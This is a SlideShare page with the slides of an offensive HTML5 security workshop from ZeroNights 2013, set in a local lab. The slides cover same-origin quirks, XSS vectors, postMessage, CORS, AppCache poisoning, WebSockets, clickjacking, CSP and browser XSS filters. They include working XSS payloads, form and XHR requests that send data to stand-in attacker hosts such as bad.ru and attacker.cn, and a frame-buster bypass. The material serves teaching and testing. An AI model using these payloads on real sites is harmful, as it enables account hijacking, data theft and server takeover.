SlideShare a Scribd company logo

Hacking HTML5 offensive course (Zeronights edition)

Krzysztof Kotowicz
Krzysztof Kotowicz

The document provides instructions for setting up a lab environment to demonstrate HTML5 hacking techniques, including exploiting the same origin policy, cross-site scripting using HTML5 features, exploiting web messaging, attacking with cross origin resource sharing, targeting client-side storage, bypassing content security policy, and analyzing browser cross-site scripting filters. It outlines various HTML5-based attacks and provides URLs to demonstration sites to try out the exploits hands-on.

1 of 39
Download to read offline
VirtualBox (~4 gb needed) shared folder - dir with upacked zeronights.zip NoVirtualBox? unpack zeronights.zip Apache + PHP Chrome + Firefox host root dir as //localvictim and //127.0.0.1 /evil dir as //evillogin:ubuntu, pass: ? http://10.10.0.1/ Hacking HTML5 Krzysztof Kotowicz ZeroNights 2013
/whoami • I work at SecuRing and Cure53 • I do web security research • I present at cons (BlackHat, BRUCon, Hack In Paris, OWASP AppSec, CONFidence, ...) • @kkotowicz • blog.kotowicz.net Plan hacks = [ "Same Origin Policy — quirks, flavors & bypasses", "XSSing with HTML5 — twisted vectors & amazing exploits", "Exploiting Web Messaging", "Attacking with Cross Origin Resource Sharing", "Targeting Client side storage and Offline Cache Poisoning", "Using WebSockets for attacks", "Iframe sandboxing & clickjacking", "Bypassing Content Security Policy", "Webkit XSS Auditor & IE Anti-XSS filter — behind the scenes", ]
Plan def plan(): ! general_intro() ! known = [js, xss, http, ..] ! for h in hacks: ! ! known.append(h) ! ! intro(h, short=True) ! ! attack_with(known) Disclaimer • Workshops highly practical • Firebug & similar tools knowledge assumed • Medium-to-hard tasks • Limited time - try at home! • Ask questions please! • Of course - use all this for educational purposes & doing legitimate stuff
Lab setup • ubuntu:ubuntu • http://localvictim • http://evil • /home/ubuntu/Desktop/remote/ • evil/solutions Same Origin Policy quirks, flavors & bypasses
Same Origin Policy • Security model for the web • Restrict communication between applications from different origins • Origin = scheme + host + port http://example.com/document http://example.com/other/document/here https://example.com/document https://www.example.com/document http://example.com:8080/document  Same Origin Policy • Multiple same origin policies - cookies, DOM access, Flash, Java, XMLHttpRequest • Different rules for policies • Multiple quirks
SOP Bypass vs XSS • SOP bypass = read / write across origins • e.g. read DOM elements • set cookies •browser / specs bug • XSS - execute code on target origin •application bug SOP Quirks • Java applets • example.com === example.net • Shared hosting => SOP bypass $ host example.com example.com has address 93.184.216.119 $ host example.net example.net has address 93.184.216.119
SOP Quirks • IE - port does not matter http://example.com:8080 == http://example.com/ • cookies: Any subdomain can set cookies to parent domains • microsoft.com must trust all *.microsoft.com sites SOP Quirks • cookie forcing - write arbitrary cookies •HTTPS • Set-Cookie: admin=false; secure • HTTP (man-in-the-middle) • Set-Cookie: admin=true; secure • Cookie: admin=true;
SOP side-channels • window.name • setting location • traversing iframes • iframe height, scrolling positions • timing • SVG filters - http://www.contextis.com/files/ Browser_Timing_Attacks.pdf top.frames[1].frames[2].length top.frames[1].frames[2].location= <iframe name="yup.anything!you()want"> window.open('a_name') Practice! • http://localvictim/01-sop/1/ • alert ‘secret’ value • http://localvictim/01-sop/2/ • detect if user is logged in or not (x-domain) • * http://localvictim/01-sop/1/index2.php • alert ‘secret’ value
XSSing with HTML5 twisted vectors & amazing exploits XSS in HTML5 <input|button autofocus> <math> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME <mtext>http://google.com</mtext> </maction> </math> <input oninput=alert(1) autofocus> <div style="height:30px;overflow:scroll" onscroll=alert(1)>.......</div>
XSS in HTML5 • Interesting form based vectors: • Send form to your server • Change target window • Change encoding <form id="f"> ... <button form=f formaction=//evil.me formtarget=...> <button form=f type=submit> XSS in HTML5 <form id=f action=https://benign.com> <input name=secret> </form> // anywhere in the document - notice no JS! <button form=f formaction=http://bad.ru>CLICK </button>
XSS in HTML5 • Data: URIs • Evade filters data:[<MIME-type>][;charset=<charset>][;base64],<data> <a href=”data:text/html, <script>alert(1)</script>”>XSS</a> <a href=”data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”> btoa() XSS in HTML5 • HTML5 helps with the exploitation • WebSockets connection with C&C • Extract local DB, geolocation, HTML5 filesystem • • // stealth mode history.pushState('/innocent-url') // persistence localStorage['code']='alert(/delayed/)'; // months later eval(localStorage['code'])
Practice! • http://localvictim/02-xss/ • alert one • * send csrf token to //evil Exploiting Web Messaging
Web Messaging Web browsers, for security and privacy reasons, prevent documents in different domains from affecting each other; that is, cross-site scripting is disallowed. While this is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile.This section introduces a messaging system that allows documents to communicate with each other regardless of their source domain, in a way designed to not enable cross-site scripting attacks. http://www.w3.org/TR/webmessaging/ Web Messaging • ...designed not to enable XSS • http://html5demos.com/ postmessage2
Web Messaging • client-side window-to-window communication • no server, no TCP traffic! • cross domain by default Web Messaging <html> // my.domain <iframe src=//other.domain/widget></iframe> // sender var w = frameElement.contentWindow; var wOrigin = 'http://example.com'; // or "*" w.postMessage('hi!', wOrigin); // receiver window.addEventListener("message", function(e) { if (e.origin !== "http://example.com") { alert('Ignoring ' + e.origin); } else { alert(e.origin + " said: " + e.data); } }, false);
Web Messaging bugs // frame could get replaced, you're sending to attacker!!! frame.postMessage({secret:stuff}, "*"); window.addEventListener("message", function(e) { ! // no sender validation ! do_stuff_with(e.data); ! // are you kidding me?? ! div.innerHTML = e.data; } Practice! • http://localvictim/03-messaging/ • XSS the victim • * hijack the contents of an email when user enters it
Attacking with Cross Origin Resource Sharing CORS • Cross domain XHR, with credentials: • cookies • SSL/TLS client certificate • HTTP auth credentials • Target server decides to allow/forbid
Classic XHR • In domain only CORS • Cross-domain allowed
CORS • XHR request reaches the target server • With appropriate credentials • Can be abused for Cross Site Request Forgery CORS // http://attacker.cn var xhr = new XMLHttpRequest(); xhr.open("POST", "http://victim.ch"); xhr.setRequestHeader("Content-Type", "text/ plain"); xhr.withCredentials = "true"; // cookies etc. xhr.send("Anything");
CORS on the wire Simple request GET /data/ HTTP/1.1 Host: target.example Origin: http://src.example … HTTP/1.1 200 OK Date: Mon, 01 Dec 2008 00:23:53 GMT Server: Apache/2.0.61 Access-Control-Allow-Origin: http://src.example Content-Type: application/json {"secret-data":xxxxxx} CORS on the wire preflight OPTIONS /data/ HTTP/1.1 Host: target.example Origin: http://src.example Access-Control-Request-Method: POST Access-Control-Request-Headers: X-MyHeader … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: X-MyHeader Access-Control-Max-Age: 1728000
CORS on the wire preflight POST /data/ HTTP/1.1 Host: target.example Origin: http://src.example Content-Type: text/xml; charset=UTF-8 Content-Length: xxx X-MyHeader: apikey=23423423 <?xml ..... … HTTP/1.1 200 OK Access-Control-Allow-Origin: http://src.example Content-Type: text/plain ok CORS - weaknesses • Again, wildcards: • Access-Control-Allow-Origin: * = everybody can read me • A-C-A-O: <sender-origin> is even worse • You can use CORS to send arbitrary blind requests (CSRF) • What if receiver is malicious?
Silent file upload Content-Type: multipart/form-data; boundary=AaB03x --AaB03x Content-Disposition: form-data; name="submit-name" Larry --AaB03x Content-Disposition: form-data; name="files"; filename="file1.txt" Content-Type: text/plain ... contents of file1.txt ... --AaB03x-- xhr.send("Anything"); Silent file upload xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=xxx"); xhr.send(' --xxxrn Content-Disposition: form-data; name="files"; filename="file1.txt"rn Content-Type: text/plainrn rn ANYTHINGrn --xxx--');
Silent file upload • Simulates multipart/form-data request with <input type=file> upload • Already used to: • Replace firmware in routers • Take control of application servers logUrl = 'http://glassfishserver/ management/domain/applications/ application'; fileUpload(c,"maliciousarchive.war"); Content injection • http://website/#/a/page • https://touch.facebook.com/#http:// example.com/xss.php HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: text/html <img src=x onerror=alert(1)> xhr.open("GET", "/a/page");
Practice! • http://localvictim/04-cors/ • XSS the victim and alert his user ID Targeting Client side storage & Offline Cache Poisoning
AppCache • HTML pages can specify a manifest URL • Manifest • text/cache-manifest MIME type • Lists URLs that should be fetched and stored <html manifest=/cache.manifest> Man in the middle • Eavesdrop / modify traffic • XSS • session hijack (Firesheep) • Doesn’t last long
AppCache poison 1. During MITM: inject poison 2. After MITM: • robots.txt has invalid MIME type • poisoned page fetched from cache • code runs until offline cache is purged <html manifest="/robots.txt"> ....<script>evil_foo()</script> CACHE MANIFEST CACHE: http://victim/ NETWORK: * Demo! • http://localvictim/05-offline/ • perform offline attack with sslstrip • google-chrome --proxy-server=http://evil:10000 • payload: alert login & password
Using WebSockets for attacks WebSockets • 2-way TCP connection from browser to server • bandwidth efficient • asynchronous - no request / response model • available to JS
WebSockets • Handshake similar to HTTP • Optionally encrypted with TLS (wss://) • Dumb protocol • No user authorization • No user authentication WebSockets if (window.WebSocket) { var url = 'ws://host:port/path' ,s = new WebSocket(url); s.onopen = function(e) {}; s.onclose = function(e) {}; s.onmessage = function(e) { // e.data - server sent data }; s.send('hello server!'); }
WebSockets security • Attack app-level protocols • look for DoS, auth flaws • Sometimes plain TCP services are tunneled over WebSockets • You can attack servers with: • browser - xss • browser - third party website • custom client Demo! • cd /home/ubuntu/Desktop/remote/06- websockets/websockify-master • ./run.sh • http://localvictim/06-websockets/ • login into ws://localvictim:9999 user ‘admin’ • * extract flag from admin home dir
Iframe sandboxing & clickjacking Clickjacking • You all know it. • Don’t get framed • Lots of websites use: if (self !== top) { ! top.location = self.location; }
Clickjacking - bypass // evil framing victim wanting to jump out of frame var kill_bust = 0 window.onbeforeunload = function(){kill_bust++}; setInterval(function() { if (kill_bust > 0) { kill_bust -= 2; top.location = '204.php'; }}, 1); // basically, a race condition on top reload Clickjacking w/ HTML5 • IFRAME sandbox restricts what a frame can do • no allow-top-navigation => top.location.href = .... fails <iframe src="http://victim.com" sandbox=" allow-forms allow-scripts" />
Practice! • http://localvictim/07-clickjacking/ • clickjack “Delete my account” button Bypassing Content Security Policy
CSP • whitelist content on your website with HTTP headers e.g. • Mitigate XSS by forbidding inline scripting • Only allow images from your CDN • Only allow XHR to your API server CSP Content-Security-Policy: default-src: 'none'; style-src: https://my.cdn.net; script-src: 'self' https://ssl.google-analytics.com; img-src: 'self' https://images.cdn.net; report-uri: https://my.com/violations
CSP • It’s XSS mitigation, XSS is still possible via obscure vectors • <iframe src=”filesystem://...> • Chrome Extensions • JSONP CSP • You can do much even without XSS • http://lcamtuf.coredump.cx/postxss/ • content extraction - unclosed elements: <img src=’..........<something>......’<else> • other - http://ruxcon.org.au/assets/slides/ CSP-kuza55.pptx
CSP • Still fresh concept & rapid development • Fresh scary bugs • https://bugzilla.mozilla.org/show_bug.cgi? id=886164 • Practice! • http://localvictim/08-csp/1.php • send CSRF token to //evil • * http://localvictim/08-csp/2.php • XSS (Firefox). If in Chrome, contact me ;)
Browser XSS filters behind the scenes Browser XSS filters • Detect dangerous patterns in HTTP request parameters (GET/POST) • Observe for reflection in HTTP response • Neutralize injection or block entire page • X-Xss-Protection: 0|1
Browser XSS filters Browser XSS filters IE8 <[i]?f{r}ame.*?[ /+t]*?src[ /+t]* (j|(&[#()=]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A| D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=]x?0*(9|(13)|( 10)|A|D);?))*(v|(&[#()=]x?0*((86)|(56)|(118)|(76));?))([t]|(&[#()=]x?0*(9 |(13)|(10)|A|D);?))*(a|(&[#()=]x?0*((65)|(41)|(97)|(61));?))([t]|(&[#()=] x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()=]x?0*((83)|(53)|(115)|(73));?))([t]|( &[#()=]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()=]x?0*((67)|(43)|(99)|(63));?))( [t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()=]x?0*((82)|(52)|(114)|(7 2));?))}([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()=]x?0*((73)|(49)| (105)|(69));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()=]x?0*((80 )|(50)|(112)|(70));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()=]x ?0*((84)|(54)|(116)|(74));?))([t]|(&[#()=]x?0*(9|(13)|(10)|A|D);?))*(:|(& [#()=]x?0*((58)|(3A));?)).
Browser XSS filters Chrome • complex rules, discovers different contexts, tries to decode etc. • http://src.chromium.org/viewvc/blink/trunk/ Source/core/html/parser/XSSAuditor.cpp? revision=HEAD&view=markup • Bypasses every other month Browser XSS filters tricks • Use to disable benign scripts (e.g. framebusters) • Only GET / POST matched => use cookies • Multiple param injections = you always win
Browser XSS filters ASP.NET tricks • http://soroush.secproject.com/blog/ 2012/06/browsers-anti-xss-methods-in-asp- classic-have-been-defeated/ • concatenation: input1=a&input1=b => a,b • truncation:anything after %00 ignored • transliteration: %u0117 => ė => e Practice! • http://localvictim/09-antixss/1.php • * http://localvictim/09-antixss/irl.php • * http://www.sdl.me/xssdemo/getxss.asp • XSS’em all (Chrome)!
That is all. thx. q&a? Liked that? //blog.kotowicz.net

Recommended

HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
Blueinfy Solutions
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
Blueinfy Solutions
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
qqlan
 
CORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSCORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORS
Jared Ottley
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 

Recommended

HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
Blueinfy Solutions
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
Blueinfy Solutions
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
qqlan
 
CORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORSCORS - Enable Alfresco for CORS
CORS - Enable Alfresco for CORS
Jared Ottley
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Burp suite
Burp suiteBurp suite
Burp suite
Yashar Shahinzadeh
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0
py_sunil
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
GreenD0g
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
Gaurav Sharma
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fu
Aditya Balapure
 
Browser security
Browser securityBrowser security
Browser security
Uday Anand
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
Piyush Pattanayak
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02
Subhajit Bhuiya
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Cross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul HakimCross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul Hakim
Cefalo
 
Demystifying REST
Demystifying RESTDemystifying REST
Demystifying REST
Kirsten Hunter
 
Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 

More Related Content

What's hot

Burp suite
Burp suiteBurp suite
Burp suite
Yashar Shahinzadeh
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0
py_sunil
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
GreenD0g
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
Gaurav Sharma
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
Shreeraj Shah
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fu
Aditya Balapure
 
Browser security
Browser securityBrowser security
Browser security
Uday Anand
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
Piyush Pattanayak
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
Shreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 
Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02
Subhajit Bhuiya
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
Shreeraj Shah
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Cross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul HakimCross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul Hakim
Cefalo
 
Demystifying REST
Demystifying RESTDemystifying REST
Demystifying REST
Kirsten Hunter
 

What's hot (20)

Burp suite
Burp suiteBurp suite
Burp suite
 
Html5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPraHtml5: something wicked this way comes - HackPra
Html5: something wicked this way comes - HackPra
 
Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0Whats new in ASP.NET 4.0
Whats new in ASP.NET 4.0
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
 
D@W REST security
D@W REST securityD@W REST security
D@W REST security
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Cors kung fu
Cors kung fuCors kung fu
Cors kung fu
 
Browser security
Browser securityBrowser security
Browser security
 
Postcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration nullPostcards from the post xss world- content exfiltration null
Postcards from the post xss world- content exfiltration null
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02Secureyourrestapi 140530183606-phpapp02
Secureyourrestapi 140530183606-phpapp02
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Cross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul HakimCross Origin Resource Sharing (CORS) - Azizul Hakim
Cross Origin Resource Sharing (CORS) - Azizul Hakim
 
Demystifying REST
Demystifying RESTDemystifying REST
Demystifying REST
 

Similar to Hacking HTML5 offensive course (Zeronights edition)

Html5 security
Html5 securityHtml5 security
Html5 security
Krishna T
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Ivo Andreev
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Browser Security
Browser SecurityBrowser Security
Browser Security
Roberto Suggi Liverani
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
Iftach Ian Amit
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
Nahidul Kibria
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
Krishna T
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)security
n|u - The Open Security Community
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
Matt Casto
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
Krishna T
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
CodeFest
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
Denis Kolegov
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx02-browser-sec-model-sop.pptx
02-browser-sec-model-sop.pptx
ssuserec53e73
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
AppSec_Labs
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Cyber Security Alliance
 

Similar to Hacking HTML5 offensive course (Zeronights edition) (20)

Html5 security
Html5 securityHtml5 security
Html5 security
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Html5 hacking
Html5 hackingHtml5 hacking
Html5 hacking
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Top Ten Web Hacking Techniques (2010)
